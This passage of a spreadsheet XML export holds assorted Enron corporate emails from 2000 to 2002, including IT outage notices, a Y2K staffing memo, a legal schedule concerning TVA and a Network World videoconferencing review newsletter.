our highest return opportunities.  Please join us in congratulating and=20_x000D_
supporting all of these individuals in their new roles._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 16 Nov 2001 12:17:04 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mccann@nc.rr.com'})</t>
  </si>
  <si>
    <t>Thanksgiving story to share with family and friends for Kenneth Lay_x000D_
 ...</t>
  </si>
  <si>
    <t xml:space="preserve">Happy Thanksgiving Kenneth..._x000D_
_x000D_
For any changes to your record, please use reply on your_x000D_
e-mail program with this entire message included because_x000D_
each record is individualized.  Your private record is in "WWW."_x000D_
_x000D_
Feel free to share this story of Thanksgiving with friends and family_x000D_
this week at http://www.BusinessCafeOnline.com. The complete_x000D_
story is nine, 8 1/2 x 11 illustrated printed pages._x000D_
_x000D_
If you would like to share the Thanksgiving story with others and link_x000D_
to our website, all you have to do is cut and paste the following_x000D_
HTML code:_x000D_
_x000D_
&lt;a href = "http://www.businesscafeonline.com"&gt;businesscafeonline.com&lt;/a&gt;_x000D_
_x000D_
Visit http://www.GlobalBusinessCafe.com for articles on Mastering_x000D_
the Business Meal, Indian Summer, Halloween origins and customs,_x000D_
leadership, National Book Festival ... and Thanksgiving.  Consider_x000D_
sponsoring this site and receive the benefits of a growing readership_x000D_
worldwide._x000D_
_x000D_
Best of the holiday season to you Kenneth..._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Michael McCann_x000D_
http://www.BusinessCafeOnline.com_x000D_
http://www.GlobalBusinessCafe.com_x000D_
919-845-9934; 919-844-2238 FAX_x000D_
Author, Managing Director - The Business Cafe_x000D_
mccann@nc.rr.com_x000D_
Raleigh, NC_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 01:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'et&amp;s.office@enron.com'})</t>
  </si>
  <si>
    <t>Emergency Maintenance Window TODAY! From 11:00 am to 1:00 pm</t>
  </si>
  <si>
    <t>The server that provides Print Services (Print Services allow you to print to _x000D_
a LAN printer) will be updated today from 11:00 am to 1:00 pm to address an _x000D_
application issue.   During this maintenance window  you may experience _x000D_
intermittent LAN printing problems.  Local printing will not impacted._x000D_
_x000D_
If for any reason this maintenance window is longer than the estimated 2 _x000D_
hours, I will send a broadcast message via your workstation screen with any _x000D_
new updates._x000D_
_x000D_
If you have any questions, issues or concerns with this outage please contact _x000D_
me directly._x000D_
_x000D_
Thanks.  Jean  x7173</t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 10:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>SUPPLEMENTAL Weekend Outage Report for 11-17-00</t>
  </si>
  <si>
    <t>------------------------------------------------------------------------------_x000D_
------------------------_x000D_
W E E K E N D   S Y S T E M S   A V A I L A B I L I T Y_x000D_
_x000D_
F O R_x000D_
_x000D_
November 17, 2000 5:00pm through November 20, 2000 12:00am_x000D_
------------------------------------------------------------------------------_x000D_
------------------------_x000D_
_x000D_
_x000D_
      _x000D_
_x000D_
SCHEDULED SYSTEM OUTAGES: _x000D_
_x000D_
ARDMORE DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages._x000D_
_x000D_
AZURIX: No Scheduled Outages._x000D_
_x000D_
EB34 DATA CENTER - FACILITY OPERATIONS: No Scheduled Outages._x000D_
_x000D_
EDI SERVER: SEE ORIGINAL REPORT_x000D_
_x000D_
EI: SEE ORIGINAL REPORT_x000D_
_x000D_
ENRON NORTH AMERICAN LANS:  No Scheduled Outages._x000D_
_x000D_
FIELD SERVICES:  No Scheduled Outages._x000D_
_x000D_
INTERNET: No Scheduled Outages._x000D_
_x000D_
LOTUS NOTES: No Scheduled Outages._x000D_
_x000D_
MARKET DATA: No Scheduled Outages._x000D_
_x000D_
NT: No Scheduled Outages._x000D_
_x000D_
OS/2:  No Scheduled Outages._x000D_
_x000D_
OTHER SYSTEMS: SEE ORIGINAL REPORT_x000D_
_x000D_
SITARA:  No Scheduled Outages._x000D_
_x000D_
SUN/OSS SYSTEM: No Scheduled Outages._x000D_
_x000D_
TELEPHONY: No Scheduled Outages_x000D_
_x000D_
TERMINAL SERVER:  No Scheduled Outages._x000D_
_x000D_
UNIFY:  _x000D_
Impact:  CORP_x000D_
Time:  Sat 11/18/2000 at  6:00:00 PM CT thru Sun 11/19/2000 at  8:00:00 AM CT_x000D_
 Sat 11/18/2000 at  4:00:00 PM PT thru Sun 11/19/2000 at  6:00:00 AM PT_x000D_
 Sun 11/19/2000 at  12:00:00 AM London thru Sun 11/19/2000 at  2:00:00 PM _x000D_
London_x000D_
Outage:  Unify_x000D_
Environments Impacted:  Unify Users_x000D_
Purpose: Rebuilding all the indexes and changing the number of partitions for _x000D_
better performance_x000D_
Backout: Restore from Backup_x000D_
Contact(s):  William Mallary  713-345-3485    _x000D_
------------------------------------------------------------------------------_x000D_
-------------------------------------------------------_x000D_
FOR ASSISTANCE_x000D_
_x000D_
(713) 853-1411   Enron Resolution Center_x000D_
(713) 853-5536   Information Risk Management_x000D_
_x000D_
Specific Applications Help:_x000D_
Unify On-Call      (713) 284-3757  [Pager]_x000D_
Sitara On-Call     (713) 288-0101  [Pager]_x000D_
RUS/GOPS/GeoTools/APRS   (713) 639-9726  [Pager]_x000D_
OSS/UA4/TARP    (713) 285-3165  [Pager]_x000D_
CPR      (713) 284-4175  [Pager]_x000D_
EDI Support      (713) 327-3893  [Pager]_x000D_
All Other Systems    (713) 563-5797  [Pager]_x000D_
      or (713) 563-5987  [Pager]</t>
  </si>
  <si>
    <t>Wed, 5 Jan 2000 05:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Thanks for January 1, 2000</t>
  </si>
  <si>
    <t xml:space="preserve">The address list on the memo below contains the names of all ENA Energy _x000D_
Operations employees who worked in the offices in Houston, Denver and Calgary _x000D_
on January 1st to test our systems.   Does it work for you to copy and paste _x000D_
this for Cliff's note?  Let me know if it would be better to provide this to _x000D_
you in a different way.  Thanks.  --Sally _x000D_
---------------------- Forwarded by Sally Beck/HOU/ECT on 01/05/2000 01:21 PM _x000D_
---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Sally Beck                           12/30/99 03:42 PM_x000D_
	_x000D_
_x000D_
To: Sally Beck/HOU/ECT@ECT, Kenneth W Walther/HOU/ECT@ECT, Molly _x000D_
Johnson/HOU/ECT@ECT, Jarrod Cyprow/HOU/ECT@ECT, Jefferson D _x000D_
Sorenson/HOU/ECT@ECT, Larry Joe Hunter/HOU/ECT@ECT, Elizabeth L _x000D_
Hernandez/HOU/ECT@ECT, Charles T Muzzy/HOU/ECT@ECT, George Smith/HOU/ECT@ECT, _x000D_
Jeff D Davis/HOU/ECT@ECT, Lisa Kinsey/HOU/ECT@ECT, Beverly Beaty/HOU/ECT@ECT, _x000D_
Cindy Vachuska/HOU/ECT@ECT, Clarissa Garcia/HOU/ECT@ECT, Edward _x000D_
Terry/HOU/ECT@ECT, Jesse Villarreal/HOU/ECT@ECT, Katherine L _x000D_
Kelly/HOU/ECT@ECT, Sabra L Dinari/HOU/ECT@ECT, Victoria Versen/HOU/ECT@ECT, _x000D_
Robert Superty/HOU/ECT@ECT, Gary L Payne/HOU/ECT@ECT, Heather _x000D_
Choate/HOU/ECT@ECT, Richard Pinion/HOU/ECT@ECT, Scotty Gilbert/HOU/ECT@ECT, _x000D_
Patti Sullivan/HOU/ECT@ECT, Randall L Gay/HOU/ECT@ECT, Stacey J _x000D_
Brewer/HOU/ECT@ECT, Natalie Baker/HOU/ECT@ECT, David Baumbach/HOU/ECT@ECT, _x000D_
Eric Bass/HOU/ECT@ECT, Jay Reitmeyer/HOU/ECT@ECT, William Kelly/HOU/ECT@ECT, _x000D_
Pat Clynes/Corp/Enron@ENRON, Robert E Lloyd/HOU/ECT@ECT, Stella L _x000D_
Morris/HOU/ECT@ECT, Susan D Trevino/HOU/ECT@ECT, Charlene _x000D_
Richmond/HOU/ECT@ECT, Hollis Hendrickson/HOU/ECT@ECT, Jeff A _x000D_
Crook/HOU/ECT@ECT, Jeff W Westover/HOU/ECT@ECT, Larry G Cash/HOU/ECT@ECT, _x000D_
Linda J Ewing/HOU/ECT@ECT, Lisa Csikos/HOU/ECT@ECT, Max Doner/HOU/ECT@ECT, _x000D_
Melissa K Ratnala/HOU/ECT@ECT, Sabrae Zajac/HOU/ECT@ECT, Sheri _x000D_
Thomas/HOU/ECT@ECT, Vivien Pham/HOU/ECT@ECT, Wade R Price/HOU/ECT@ECT, Amelia _x000D_
Alland/HOU/ECT@ECT, Sylvia A Campos/HOU/ECT@ECT, Jason Moore/HOU/ECT@ECT, _x000D_
Samuel Schott/HOU/ECT@ECT, Donna Consemiu/HOU/ECT@ECT, Marilyn _x000D_
Colbert/HOU/ECT@ECT, Mary Solmonson/HOU/ECT@ECT, Veronica I _x000D_
Arriaga/HOU/ECT@ECT, Carolyn Gilley/HOU/ECT@ECT, Mark D Thorne/HOU/ECT@ECT, _x000D_
Shirlet Williams/HOU/ECT@ECT, Melissa White/HOU/ECT@ECT, Daren J _x000D_
Farmer/HOU/ECT@ECT, Cassandra Moses/HOU/ECT@ECT, Howard B Camp/HOU/ECT@ECT, _x000D_
Rita Wynne/HOU/ECT@ECT, Kellie Bilski/HOU/ECT@ECT, Michael Eiben/HOU/ECT@ECT, _x000D_
Bryce Baxter/HOU/ECT@ECT, Marlo C James/HOU/ECT@ECT, Kim S _x000D_
Theriot/HOU/ECT@ECT, Rhonda L Denton/HOU/ECT@ECT, Sharen Cason/HOU/ECT@ECT, _x000D_
John D Postlethwaite/HOU/ECT@ECT, Kristin Albrecht/HOU/ECT@ECT, Stacey W _x000D_
White/HOU/ECT@ECT, Evelyn Aucoin/HOU/ECT@ECT, Leslie Reeves/HOU/ECT@ECT, _x000D_
Theresa R Kotrla/HOU/ECT@ECT, Bob Shults/HOU/ECT@ECT, Carrie _x000D_
Southard/HOU/ECT@ECT, Dale Neuner/HOU/ECT@ECT, Donna Greif/HOU/ECT@ECT, Frank _x000D_
L Davis/HOU/ECT@ECT, Jennifer deBoisblanc Denny/HOU/ECT@ECT, Lisa _x000D_
Gillette/HOU/ECT@ECT, Lorraine Becker/HOU/ECT@ECT, Tara Sweitzer/HOU/ECT@ECT, _x000D_
Chris Swenson/HOU/ECT@ECT, Torrey Moorer/HOU/ECT@ECT, Sheila _x000D_
Glover/HOU/ECT@ECT, Bennett Kaufman/HOU/ECT@ECT, Dart Arnaez/HOU/ECT@ECT, _x000D_
Theresa T Brogan/HOU/ECT@ECT, Rebecca Ford/HOU/ECT@ECT, Bob _x000D_
Klein/HOU/ECT@ECT, Bradley Diebner/HOU/ECT@ECT, Laurel Adams/HOU/ECT@ECT, _x000D_
Robert Richard/Corp/Enron@ENRON, Gary Stadler/HOU/ECT@ECT, Michael E _x000D_
Moscoso/HOU/ECT@ECT, Chris Abel/HOU/ECT@ECT, David Maxwell/HOU/ECT@ECT, John _x000D_
Jacobsen/HOU/ECT@ECT, Robert Richard/Corp/Enron@ENRON, Scott _x000D_
Pleus/HOU/ECT@ECT, Cliff Lawrick/CAL/ECT@ECT, Peggy Hedstrom/CAL/ECT@ECT, _x000D_
Chris Wiebe/CAL/ECT@ECT, Kevin Heal/CAL/ECT@ECT, Kathy Reeves/CAL/ECT@ECT, _x000D_
Dan Dietrich/CAL/ECT@ECT, Scott Sitter/DEN/ECT@Enron, Theresa _x000D_
Staab/Corp/Enron@ENRON_x000D_
cc: Cliff Baxter/HOU/ECT@ECT, Kevin P Hannon/HOU/ECT@ECT, Greg _x000D_
Whalley/HOU/ECT@ECT, Richard Causey/Corp/Enron@ENRON _x000D_
Subject: Thanks for January 1, 2000_x000D_
_x000D_
I wanted to extend my thanks in advance to all of you who will join me in the _x000D_
office on January 1, 2000.  I appreciate your willingness to devote part of _x000D_
your holiday weekend to the continuing success story at Enron.  _x000D_
_x000D_
As a company, Enron has spent much time and effort to ensure that business _x000D_
will continue smoothly as we move into the year 2000.  Ken Walther, in _x000D_
working with many of you, has done an excellent job of preparing a work plan _x000D_
for January 1.    Your  work on the first  will be the final step in this _x000D_
process.  Your efforts that day will allow all ENA employees to return to the _x000D_
office on January 4th with confidence in our ability to continue business as _x000D_
usual.  _x000D_
_x000D_
I wish each one of you a happy new year.  I continually feel privileged to _x000D_
work with this dedicated and talented group of  employees.  I look forward to _x000D_
all that we will accomplish in 2000.   _x000D_
</t>
  </si>
  <si>
    <t>Tue, 15 May 2001 12:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'joan.quick@enron.com', 'susan.smith@enron.com', 'marilyn.colbert@enron.com', 'michael.morris@enron.com', 'sylvia.campos@enron.com', 'faye.ellis@enron.com', 'justin.timothy@enron.com', 'robert.cass@enron.com', 'genia.fitzgerald@enron.com', 'patrice.mims@enron.com', 'brad.coleman@enron.com', 'sylvia.pollan@enron.com', 'mary.gosnell@enron.com', 'connie.sutton@enron.com', "karen.o'day@enron.com", 'lisa.carver@enron.com', 'elizabeth.hernandez@enron.com', 'larry.hunter@enron.com', 'edward.terry@enron.com', 'dianne.seib@enron.com', 'melissa.graves@enron.com', 'christa.winfrey@enron.com', 'kenneth.harmon@enron.com', 'shonnie.daniel@enron.com', 'stephanie.panus@enron.com', 'jeff.richter@enron.com', 'anita.patton@enron.com', 'cyril.price@enron.com', 'melba.lozano@enron.com', 'colleen.sullivan@enron.com', 'elsa.villarreal@enron.com', 'eol.center@enron.com', 'anthony.campos@enron.com', 'vance.taylor@enron.com', 'bill.hare@enron.com', 'irene.flynn@enron.com', 'jason.moore@enron.com', 'victor.lamadrid@enron.com', 'debbie.brackett@enron.com', 'amelia.alland@enron.com', 'camille.gerard@enron.com', 'mark.thorne@enron.com', 'richard.miley@enron.com', 'samuel.schott@enron.com', 'mary.smith@enron.com', 'laura.vargas@enron.com', 'oscar.rivera@enron.com', 'lisa.cousino@enron.com', 'kimberlee.bennick@enron.com', 'peter.berzins@enron.com', 'donald.reinhardt@enron.com', 'brenda.herod@enron.com', 'scotty.gilbert@enron.com', 'clem.cernosek@enron.com', 'bernice.rodriguez@enron.com', 'jennifer.oliver@enron.com', 'john.powell@enron.com', 'claudia.clark@enron.com', 'susan.elledge@enron.com', 'kate.symes@enron.com', 'james.scribner@enron.com', 'peggy.hedstrom@enron.com', 'andrew.lewis@enron.com', 'richard.mckeel@enron.com', 'tara.sweitzer@enron.com', 'chris.mallory@enron.com', 'tony.harris@enron.com', 'edward.baughman@enron.com', 'daren.farmer@enron.com', 'geoff.storey@enron.com', 'lauri.allen@enron.com', 'kim.theriot@enron.com', 'russell.diamond@enron.com', 'nanette.kettler@enron.com', 'jefferson.sorenson@enron.com', 'bridgette.anderson@enron.com', 'rahil.jafry@enron.com', "romeo.d'souza@enron.com", 'sanjeev.gupta@enron.com', 'scott.lytle@enron.com', 'cheryl.dawes@enron.com', 'carrie.southard@enron.com', 'marilyn.schoppe@enron.com', 'gary.lamphier@enron.com', 'enron.facilities@enron.com', 'joshua.meachum@enron.com', 'keith.clark@enron.com', 'walter.guidroz@enron.com', 'willie.stewart@enron.com', 'john.suttle@enron.com', 'fred.boas@enron.com', 'fiona.skinner@enron.com', 'john.nowlan@enron.com', 'shawna.flynn@enron.com', 'veronica.espinoza@enron.com', 'marlene.hilliard@enron.com', 'karen.lambert@enron.com', 'george.weissman@enron.com', 'kori.loibl@enron.com', 'lisa.gillette@enron.com', 'sony.wilson@enron.com', 'richard.pinion@enron.com', 'enron.counterparty@enron.com', 'mike.croucher@enron.com', 'tom.moore@enron.com', 'jackie.morgan@enron.com', 'cheryl.dudley@enron.com', 'carlos.rodriguez@enron.com', 'rhonda.denton@enron.com', 'linda.bryan@enron.com', 'claire.viejou@enron.com', 'hoong.foon@enron.com', 'rousseau.anai@enron.com', 'andrea.guillen@enron.com', 'sherry.dawson@enron.com', 'jim.little@enron.com', 'glenda.mitchell@enron.com', 'stacy.dickson@enron.com', 'elsie.lew@enron.com', 'julie.meyers@enron.com', 'matt.motsinger@enron.com', 'carey.metz@enron.com', 'robert.walker@enron.com', 'carolyn.gilley@enron.com', 'robert.cotten@enron.com', 'randall.gay@enron.com', 'cary.carrabine@enron.com', 'rebecca.ford@enron.com', 'phillip.platter@enron.com', 'nathan.hlavaty@enron.com', 'torrey.moorer@enron.com', 'debra.perlingiere@enron.com', 'katherine.kelly@enron.com', 'monica.lande@enron.com', 'amita.gosalia@enron.com', 'philippe.travis@enron.com', 'karin.williams@enron.com', 'michael.eiben@enron.com', 'sheri.thomas@enron.com', 'liz.hillman@enron.com', 'hillary.mack@enron.com', 'tracy.ngo@enron.com', 'jeremy.morris@enron.com', 'anne.bike@enron.com', 'veronica.thompson@enron.com', 'frank.davis@enron.com', 'nidia.mendoza@enron.com', 'brad.schneider@enron.com', 'b.palmer@enron.com', 'david.hardy@enron.com', 'lisa.lees@enron.com', 'susan.trevino@enron.com', 'matilda.machado@enron.com', 'simone.rose@enron.com', 'jeremy.wong@enron.com', 'sam.round@enron.com', 'stephanie.sever@enron.com', 'diane.ellstrom@enron.com', 'regina.perkins@enron.com', 'jim.homco@enron.com', 'laurel.adams@enron.com', 'dale.neuner@enron.com', 'brant.reves@enron.com', 'suzy.robey@enron.com', 'james.shirley@enron.com', 'rita.wynne@enron.com', 'michele.small@enron.com', 'donna.consemiu@enron.com', 'arfan.aziz@enron.com', 'bruce.mills@enron.com', 'pat.clynes@enron.com', 'cindy.horn@enron.com', 'jennifer.denny@enron.com', 'lesli.campbell@enron.com', 'georgia.blanchard@enron.com', 'carla.hoffman@enron.com', 'cyndie.balfour-flanagan@enron.com', 'troy.klussmann@enron.com', 'lynn.shivers@enron.com', 'tana.jones@enron.com', 'debbie.nicholls@enron.com', 'stacey.richardson@enron.com', 'frank.ortiz@enron.com', 'winston.goodbody@enron.com', "o'neal.winfree@enron.com", 'jennifer.blay@enron.com', 'leslie.reeves@enron.com', 'bob.bowen@enron.com'})</t>
  </si>
  <si>
    <t>Final Name Change/Merger Report 0101</t>
  </si>
  <si>
    <t xml:space="preserve">Please find attached the FINAL Name Change/Merger Notification Report for _x000D_
January.  To launch the report, double click on the attachment and select _x000D_
"Enable Macros" and "Read Only".   The Jan 01 Changes tab summarizes _x000D_
additions to the report since Jan. 15.  _x000D_
Please note that:_x000D_
 ERMS short names will be changed in GCP and ERMS each Friday at 10am Central _x000D_
Time, and _x000D_
 Inactivations will be made on Feb 1_x000D_
_x000D_
For more information, please click below:_x000D_
_x000D_
_x000D_
Each month now has two sheets, a summary sheet (eg Jan 01 Changes) and a _x000D_
detailed sheet (eg Jan 01)._x000D_
Click below for more information:_x000D_
_x000D_
The summary sheet can be used to view all changes after a certain date.  If _x000D_
you're aware of all changes up to, say, January 15th enter 01/16/2001 in cell _x000D_
C6 of the Summary Sheet and click the Sort button in cell H6.  All changes _x000D_
made to the report on or after January 16th will be listed automatically._x000D_
The Summary sheet may also be sorted for certain criteria - use the drop down _x000D_
arrows alongside the column headers to make your selection._x000D_
_x000D_
This sheet contains all the information you are used to seeing, but slightly _x000D_
reformatted.  Key points are: _x000D_
In the case of an Inactivation, the cause of the Inactivation (eg Merger) is _x000D_
listed in the Comments section_x000D_
As with the previous format, _x000D_
all months' reports will be sent cumulatively throughout the year_x000D_
the report will be sent out twice each month, on the 15th and at the end of _x000D_
the month._x000D_
_x000D_
_x000D_
It is our aim to publish the report in Livelink and to send out only the _x000D_
summary sheet and a URL for the detailed report each month.  This will save a _x000D_
lot of space in Lotus Notes and we hope it will streamline your monitoring _x000D_
process._x000D_
_x000D_
We'd be very happy to receive any comments you may have.  _x000D_
</t>
  </si>
  <si>
    <t>Tue, 11 Jan 2000 07:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.haedicke@enron.com', 'kevin.presto@enron.com', 'rogers.herndon@enron.com', 'cliff.baxter@enron.com', 'mmiller@torg.ect.enron.com', 'richard.sanders@enron.com', 'christi.nicolay@enron.com', 'david.delainey@enron.com', 'james.fallon@enron.com', 'karen.denne@enron.com', 'kevin.hannon@enron.com', 'joe.hartsoe@enron.com', 'steven.kean@enron.com', 'greg.whalley@enron.com'})</t>
  </si>
  <si>
    <t>TVA - Time schedule for EPMI's actions</t>
  </si>
  <si>
    <t>ATTORNEY WORK PRODUCT: NOT DISCOVERABLE_x000D_
_x000D_
The following is the current schedule for certain actions EPMI has taken or _x000D_
is contemplating taking relating to TVA:_x000D_
_x000D_
Jan 6 -  MOPA- Sent notice to TVA by fax stating that a Triggering Event _x000D_
occurred and asking TVA to consider our  proposal in order to continue the _x000D_
MOPA in  effect (to date, there has been no response from TVA) _x000D_
_x000D_
Jan 24 - Operations - Cut transmission line for 2000 peaker_x000D_
_x000D_
Jan 26 - MOPA - Notify TVA that EPMI is suspending deliveries under the MOPA  _x000D_
effective Jan 27 and terminating the  MOPA by selecting an Early Termination  _x000D_
Date ( which date may be no earlier than 10 Business Days after delivery of _x000D_
notice)_x000D_
_x000D_
Feb 4 - Control Area - File complaint  relating to TVA's actions against _x000D_
EPMI's control areas, which lawsuit would be filed in the Eastern District of _x000D_
Tenn. (Judge  Edgar) as part of the already filed lawsuit on the interface _x000D_
issues_x000D_
_x000D_
If you have any questions or concerns with this schedule, please notify me _x000D_
immediately.  _x000D_
_x000D_
Unless there are any objections, we will proceed on this basis; provided, _x000D_
however, if we hear from Mike Miller that the target operations date of Jan _x000D_
24th can not be met, we would then propose to expedite this schedule.  If we _x000D_
move up any of these actions, we will notify everybody,_x000D_
_x000D_
Elizabeth Sager_x000D_
36349</t>
  </si>
  <si>
    <t>Thu, 21 Feb 2002 07:38:51 -0800 (PST)</t>
  </si>
  <si>
    <t>ETS and  Corporate Change Control</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
The following items were presented in this week's corporate change control...._x000D_
_x000D_
Feb. 21_x000D_
From 11:00 a.m. - 2:00 p.m., Enron Network Services will re-address the IP structure for Enron Aviation.  This change is to facilitate the establishment of an interim disaster recovery site for ETS.  The aviation network will experience intermittent outages during this maintenance.  No impact to ETS is expected._x000D_
Feb. 21_x000D_
From 4:00 - 5:00 p.m., the Corporate Infrastructure team will establish a one-way trust been UBS and corp.enron.com.  No impact is expected._x000D_
Feb. 22_x000D_
From 7:00 - 8:00 p.m., Facilities will conduct their regularly scheduled maintenance on the backup water chillers.  No impact is expected._x000D_
Feb. 23_x000D_
From 7:00 - 8:15 p.m., Telephony Services will perform maintenance on the ATM links between ECN and ECS.  No impact is expected._x000D_
_x000D_
ETS Solution Center - Houston, at 713-345-4745_x000D_
ETS Solution Center - Omaha, at 402-398-7454_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 Mar 2000 00:01:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'productreview@bdcimail.com'})</t>
  </si>
  <si>
    <t>Videoconferencing picture clears up</t>
  </si>
  <si>
    <t>NETWORK WORLD FUSION FOCUS: NEAL WEINBERG on PRODUCT REVIEW OF THE WEEK_x000D_
Today's Focus: Videoconferencing picture clears up_x000D_
03/14/00_x000D_
_x000D_
Dear Wincenty Kaminski,_x000D_
_x000D_
~~~~~~~~~~~~~~~This newsletter sponsored=20_x000D_
by W. Quinn ~~~~~~~~~~~~~~~~~~_x000D_
_x000D_
How to Regain The 30% of NT/2000 Server Space That's Wasted_x000D_
FREE! Get a grip on spiraling disk consumption and regain 30% or more_x000D_
of your site=01,s enterprise storage capacity. WQuinn's StorageCeNTral_x000D_
lets you: Monitor, track and control user disk consumption; identify &amp;_x000D_
remove old files that clutter your drives; and control what types of_x000D_
files your users can write to your servers._x000D_
Get a grip on your NT/2000 storage space -- FREE eval:_x000D_
http://www3.nwfusion.com/click;1022753;0;0;2;0;?http://nww1.com/go/1022753.=_x000D_
htm_x000D_
l_x000D_
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D_
Copy and paste URLs that break in two lines and remove extra spaces._x000D_
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D_
_x000D_
Today's Focus: Videoconferencing picture clears up_x000D_
---------------------------------------------------------------_x000D_
By Neal Weinberg_x000D_
_x000D_
If you=01,ve been turned off by the jumpy frames and poor audio quality_x000D_
associated with real-time videoconferencing, the Reviewmeister has good_x000D_
news for you.  There=01,s a new generation of videoconferencing end-point_x000D_
devices that provide business-quality pictures and sound for under_x000D_
$12,000._x000D_
_x000D_
We grabbed a box of popcorn and tested eight videoconferencing systems,_x000D_
using 384K bit/sec ISDN and IP connections._x000D_
_x000D_
In the category of videoconferencing appliances  that is, standalone_x000D_
systems that go in a conference room for group video sessions with_x000D_
colleagues or business partners  Polycom=01,s ViewStation MP was the_x000D_
clear winner._x000D_
_x000D_
The Polycom ViewStation provided outstanding video and audio quality._x000D_
In addition, it was easy to install, configure and use._x000D_
_x000D_
In the category of PC-based products, which are especially good for_x000D_
virtual collaboration from your desktop, VCON=01,s MC800 was the hands-_x000D_
down winner, based on its high-quality components._x000D_
_x000D_
The beauty of these products is they allow you to have a real-time_x000D_
video image of the person you=01,re conferencing with in one corner of_x000D_
the screen, with the rest of the space available for data collaboration._x000D_
_x000D_
If you=01,re in the market for a system, be sure to get one with a Sony_x000D_
EVI D30/31 video camera; an unidirectional boundary microphone, like_x000D_
the Audio Technica; and a quality sound mixer. And look for remote_x000D_
administration and system management tools. For example, the_x000D_
ViewStation allows you to upgrade software, change settings, or change_x000D_
address book entries directly from the administrator=01,s system._x000D_
_x000D_
Most systems will allow you to transmit over ISDN or IP, but we found_x000D_
performance over IP was dragged down by IP=01,s overhead requirements. For_x000D_
the complete product review, go to:_x000D_
http://www.nwfusion.com/reviews/2000/0313rev.html_x000D_
_x000D_
Of course, there=01,s more to videoconferencing than end points, so we_x000D_
whipped up an implementation guide that lays out the network topology,_x000D_
bandwidth and quality-of-service issues._x000D_
http://www.nwfusion.com/reviews/2000/0313rev2.html_x000D_
_x000D_
Based on our testing, the Reviewmeister says now is the time to start_x000D_
pilot-testing a videoconferencing system. Your chief information_x000D_
officer will love it when you tell him you can slash your company=01,s_x000D_
airline and hotel bills because you=01,ve got people from all over the_x000D_
company in virtual rather than face-to-face meetings._x000D_
_x000D_
Next week: We loaded Windows 2000 on a PC and a server and ran Gigabit_x000D_
Ethernet to the desktop. Guess where the bottleneck was?_x000D_
_x000D_
To contact Neal Weinberg:_x000D_
----------------------_x000D_
Neal Weinberg is features editor at Network World, in charge of product_x000D_
reviews, Buyer's Guides, technology primers, how-tos, issue-oriented_x000D_
feature stories and the Technology Insider series. You can reach him at_x000D_
mailto:nweinber@nww.com._x000D_
_x000D_
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D_
FOR RELATED LINKS -- Click here for Network World's home page:_x000D_
http://www.nwfusion.com_x000D_
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D_
_x000D_
Videoconferencing picture clears up, Network World, 03/13/00_x000D_
http://www.nwfusion.com/reviews/2000/0313rev.html_x000D_
_x000D_
But implementation is still fuzzy, Network World, 03/13/00_x000D_
http://www.nwfusion.com/reviews/2000/0313rev2.html_x000D_
_x000D_
How we did it, Network World, 03/13/00_x000D_
http://www.nwfusion.com/reviews/2000/0313how.html_x000D_
_x000D_
*********************************************************_x000D_
Subscription Services_x000D_
_x000D_
To subscribe or unsubscribe to any Network World e-mail newsletters,_x000D_
go to:_x000D_
http://www.nwwsubscribe.com/news/scripts/notprinteditnews.asp_x000D_
_x000D_
To change your email address, go to:_x000D_
http://www.nwwsubscribe.com/news/scripts/changeemail.asp_x000D_
_x000D_
Subscription questions? Contact Customer Service by replying to this_x000D_
message._x000D_
_x000D_
Other Questions/Comments_x000D_
_x000D_
Have editorial comments? Write Jeff Caruso, Newsletter Editor, at:_x000D_
mailto:jcaruso@nww.com_x000D_
_x000D_
For advertising information, write Jamie Kalbach, Account Executive,_x000D_
at: mailto:jkalbach@nww.com_x000D_
_x000D_
Network World Fusion is part of IDG.net, the IDG Online Network._x000D_
IT All Starts Here:_x000D_
http://www.idg.com_x000D_
_x000D_
Copyright Network World, Inc., 2000</t>
  </si>
  <si>
    <t>Mon, 28 Aug 2000 09:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Wah Chang</t>
  </si>
  <si>
    <t xml:space="preserve">Tana, can you answer this for me..... thanks,   John _x000D_
---------------------- Forwarded by John Malowney/HOU/ECT on 08/28/2000 06:27 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Jan M King_x000D_
08/28/2000 03:45 PM_x000D_
To: John Malowney/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Wah Chang  _x000D_
_x000D_
I don't believe we do, John. But you should check with Tana Jones in _x000D_
Houston.  She handles ISDAs._x000D_
_x000D_
_x000D_
_x000D_
John Malowney_x000D_
08/28/2000 01:50 PM_x000D_
To: Jan M King/HOU/ECT@ECT, Tracy Ngo/PDX/ECT@ECT_x000D_
cc:  _x000D_
Subject: Wah Chang_x000D_
_x000D_
Jan, do we have an ISDA with Wah Chang ??  They are owned by Allegheny _x000D_
Technologies._x000D_
_x000D_
Tracy, can you start looking at their credit/financials for me ??_x000D_
_x000D_
_x000D_
Thanks,   John_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Oct 2000 05:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: John Arnold's PC</t>
  </si>
  <si>
